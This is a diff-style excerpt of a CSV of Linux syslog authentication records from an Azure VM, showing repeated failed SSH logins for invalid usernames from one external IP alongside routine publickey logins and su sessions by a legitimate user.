+19844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:10,UbuntuDevEnv,2019-06-06 18:17:09,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 38308:11: Normal Shutdown, Thank you for playing [preauth]",11423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,38308,,
+19845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:10,UbuntuDevEnv,2019-06-06 18:17:09,auth,UbuntuDevEnv,info,Disconnected from invalid user jay 128.199.149.61 port 38308 [preauth],11423,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jay,128.199.149.6,38308,,
+19846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:17,UbuntuDevEnv,2019-06-06 18:17:17,auth,UbuntuDevEnv,info,Invalid user jeff from 128.199.149.61 port 42938,11445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jeff,128.199.149.6,42938,,
+19847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:17,UbuntuDevEnv,2019-06-06 18:17:17,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 42938:11: Normal Shutdown, Thank you for playing [preauth]",11445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,42938,,
+19848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:17,UbuntuDevEnv,2019-06-06 18:17:17,auth,UbuntuDevEnv,info,Disconnected from invalid user jeff 128.199.149.61 port 42938 [preauth],11445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jeff,128.199.149.6,42938,,
+19849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:23,UbuntuDevEnv,2019-06-06 18:17:23,auth,UbuntuDevEnv,info,Invalid user jenkins from 128.199.149.61 port 47554,11451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,128.199.149.6,47554,,
+19850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:24,UbuntuDevEnv,2019-06-06 18:17:23,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 47554:11: Normal Shutdown, Thank you for playing [preauth]",11451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,47554,,
+19851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:24,UbuntuDevEnv,2019-06-06 18:17:23,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 128.199.149.61 port 47554 [preauth],11451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,128.199.149.6,47554,,
+19852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:31,UbuntuDevEnv,2019-06-06 18:17:30,auth,UbuntuDevEnv,info,Invalid user jenna from 128.199.149.61 port 52188,11463,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenna,128.199.149.6,52188,,
+19853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:31,UbuntuDevEnv,2019-06-06 18:17:30,auth,UbuntuDevEnv,info,Disconnected from invalid user jenna 128.199.149.61 port 52188 [preauth],11463,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenna,128.199.149.6,52188,,
+19854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:31,UbuntuDevEnv,2019-06-06 18:17:30,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 52188:11: Normal Shutdown, Thank you for playing [preauth]",11463,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,52188,,
+19855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:37,UbuntuDevEnv,2019-06-06 18:17:36,auth,UbuntuDevEnv,info,Invalid user iulia from 128.199.149.61 port 56810,11474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,iulia,128.199.149.6,56810,,
+19856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:37,UbuntuDevEnv,2019-06-06 18:17:36,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 56810:11: Normal Shutdown, Thank you for playing [preauth]",11474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,56810,,
+19857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:37,UbuntuDevEnv,2019-06-06 18:17:36,auth,UbuntuDevEnv,info,Disconnected from invalid user iulia 128.199.149.61 port 56810 [preauth],11474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,iulia,128.199.149.6,56810,,
+19858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:44,UbuntuDevEnv,2019-06-06 18:17:44,auth,UbuntuDevEnv,info,Invalid user julie from 128.199.149.61 port 33196,11480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,julie,128.199.149.6,33196,,
+19859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:44,UbuntuDevEnv,2019-06-06 18:17:44,auth,UbuntuDevEnv,info,Disconnected from invalid user julie 128.199.149.61 port 33196 [preauth],11480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,julie,128.199.149.6,33196,,
+19860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:44,UbuntuDevEnv,2019-06-06 18:17:44,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 33196:11: Normal Shutdown, Thank you for playing [preauth]",11480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,33196,,
+19861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:50,UbuntuDevEnv,2019-06-06 18:17:50,auth,UbuntuDevEnv,info,Invalid user juan from 128.199.149.61 port 37826,11493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,juan,128.199.149.6,37826,,
+19862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:50,UbuntuDevEnv,2019-06-06 18:17:50,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 37826:11: Normal Shutdown, Thank you for playing [preauth]",11493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,37826,,
+19863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:50,UbuntuDevEnv,2019-06-06 18:17:50,auth,UbuntuDevEnv,info,Disconnected from invalid user juan 128.199.149.61 port 37826 [preauth],11493,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,juan,128.199.149.6,37826,,
+19864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:57,UbuntuDevEnv,2019-06-06 18:17:56,auth,UbuntuDevEnv,info,Invalid user ghost from 128.199.149.61 port 42446,11510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ghost,128.199.149.6,42446,,
+19865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:57,UbuntuDevEnv,2019-06-06 18:17:57,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 42446:11: Normal Shutdown, Thank you for playing [preauth]",11510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,42446,,
+19866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:17:57,UbuntuDevEnv,2019-06-06 18:17:57,auth,UbuntuDevEnv,info,Disconnected from invalid user ghost 128.199.149.61 port 42446 [preauth],11510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ghost,128.199.149.6,42446,,
+19867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:04,UbuntuDevEnv,2019-06-06 18:18:03,auth,UbuntuDevEnv,info,Invalid user ghost from 128.199.149.61 port 47074,11523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ghost,128.199.149.6,47074,,
+19868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:04,UbuntuDevEnv,2019-06-06 18:18:03,auth,UbuntuDevEnv,info,Disconnected from invalid user ghost 128.199.149.61 port 47074 [preauth],11523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ghost,128.199.149.6,47074,,
+19869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:04,UbuntuDevEnv,2019-06-06 18:18:03,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 47074:11: Normal Shutdown, Thank you for playing [preauth]",11523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,47074,,
+19870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:33:23,UbuntuDevEnv,2019-06-06 18:33:22,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 182.91.132.232 port 46366: Too many authentication failures [preauth],15443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,182.91.132.2,46366,,
+19871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:33:23,UbuntuDevEnv,2019-06-06 18:33:22,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 182.91.132.232 port 46366 ssh2 [preauth],15443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,182.91.132.2,46366,,
+19872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:35:33,UbuntuDevEnv,2019-06-06 18:35:32,auth,UbuntuDevEnv,info,Connection closed by authenticating user peteb 40.118.187.26 port 52920 [preauth],15627,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peteb,40.118.187.2,52920,,authenticating
+19873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 22:57:18,UbuntuDevEnv,2019-06-03 22:57:17,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,2456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 22:57:18,UbuntuDevEnv,2019-06-03 22:57:17,authpriv,UbuntuDevEnv,err,pam_systemd(sshd:session): Failed to release session: Interrupted system call,2456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-03 22:57:18,UbuntuDevEnv,2019-06-03 22:57:17,auth,UbuntuDevEnv,info,Received signal 15  terminating.,1497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 16:34:04,UbuntuDevEnv,2019-06-06 16:34:03,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.147.182 port 45336 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,8749,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.147.1,45336,,
+19877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 16:34:04,UbuntuDevEnv,2019-06-06 16:34:03,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),8749,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 16:34:04,UbuntuDevEnv,2019-06-06 16:34:03,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 16:34:04,UbuntuDevEnv,2019-06-06 16:34:03,auth,UbuntuDevEnv,info,New session 9 of user peteb.,1193,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 16:34:05,UbuntuDevEnv,2019-06-06 16:34:05,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),8768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 16:34:05,UbuntuDevEnv,2019-06-06 16:34:05,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.147.182 port 32903 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,8768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.147.1,32903,,
+19882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 16:34:05,UbuntuDevEnv,2019-06-06 16:34:05,auth,UbuntuDevEnv,info,New session 11 of user peteb.,1193,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:12:28,UbuntuDevEnv,2019-06-06 17:12:27,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,2109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:13:53,UbuntuDevEnv,2019-06-06 17:13:52,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.147.182 port 16117 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,2529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.147.1,16117,,
+19885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:13:53,UbuntuDevEnv,2019-06-06 17:13:52,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),2529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:13:53,UbuntuDevEnv,2019-06-06 17:13:52,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:13:53,UbuntuDevEnv,2019-06-06 17:13:52,auth,UbuntuDevEnv,info,New session 2 of user peteb.,976,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:13:54,UbuntuDevEnv,2019-06-06 17:13:54,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.147.182 port 8267 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,2535,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.147.1,8267,,
+19889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:13:54,UbuntuDevEnv,2019-06-06 17:13:54,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),2535,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+19890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:13:54,UbuntuDevEnv,2019-06-06 17:13:54,auth,UbuntuDevEnv,info,New session 4 of user peteb.,976,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+19891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:20:39,UbuntuDevEnv,2019-06-06 17:20:39,authpriv,UbuntuDevEnv,info,+ /dev/pts/0 root:omsagent,4198,10.0.1.4,su,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:20:39,UbuntuDevEnv,2019-06-06 17:20:39,authpriv,UbuntuDevEnv,debug,pam_systemd(su:session): Cannot create session: Already running in a session,4198,10.0.1.4,su,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:20:39,UbuntuDevEnv,2019-06-06 17:20:39,authpriv,UbuntuDevEnv,info,pam_unix(su:session): session opened for user omsagent by peteb(uid=0),4198,10.0.1.4,su,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,omsagent,,,0,peteb
+19894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:20:39,UbuntuDevEnv,2019-06-06 17:20:39,authpriv,UbuntuDevEnv,info,Successful su for omsagent by root,4198,10.0.1.4,su,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,,,root
+19895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:20:42,UbuntuDevEnv,2019-06-06 17:20:42,authpriv,UbuntuDevEnv,info,pam_unix(su:session): session closed for user omsagent,4198,10.0.1.4,su,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,omsagent,,,,
+19896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:20:53,UbuntuDevEnv,2019-06-06 17:20:53,authpriv,UbuntuDevEnv,info,pam_unix(su:session): session opened for user omsagent by peteb(uid=0),4278,10.0.1.4,su,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,omsagent,,,0,peteb
+19897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:20:53,UbuntuDevEnv,2019-06-06 17:20:53,authpriv,UbuntuDevEnv,info,Successful su for omsagent by root,4278,10.0.1.4,su,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,,,root
+19898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:20:53,UbuntuDevEnv,2019-06-06 17:20:53,authpriv,UbuntuDevEnv,info,+ /dev/pts/0 root:omsagent,4278,10.0.1.4,su,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:20:53,UbuntuDevEnv,2019-06-06 17:20:53,authpriv,UbuntuDevEnv,debug,pam_systemd(su:session): Cannot create session: Already running in a session,4278,10.0.1.4,su,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+19900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 17:20:55,UbuntuDevEnv,2019-06-06 17:20:54,authpriv,UbuntuDevEnv,info,pam_unix(su:session): session closed for user omsagent,4278,10.0.1.4,su,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,omsagent,,,,
+19901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:16,UbuntuDevEnv,2019-06-06 18:13:15,auth,UbuntuDevEnv,info,Invalid user debug from 128.199.149.61 port 50506,10876,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,debug,128.199.149.6,50506,,
+19902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:16,UbuntuDevEnv,2019-06-06 18:13:16,auth,UbuntuDevEnv,info,Disconnected from invalid user debug 128.199.149.61 port 50506 [preauth],10876,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,debug,128.199.149.6,50506,,
+19903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:16,UbuntuDevEnv,2019-06-06 18:13:16,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 50506:11: Normal Shutdown, Thank you for playing [preauth]",10876,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,50506,,
+19904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:23,UbuntuDevEnv,2019-06-06 18:13:22,auth,UbuntuDevEnv,info,Invalid user sam from 128.199.149.61 port 55122,10890,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sam,128.199.149.6,55122,,
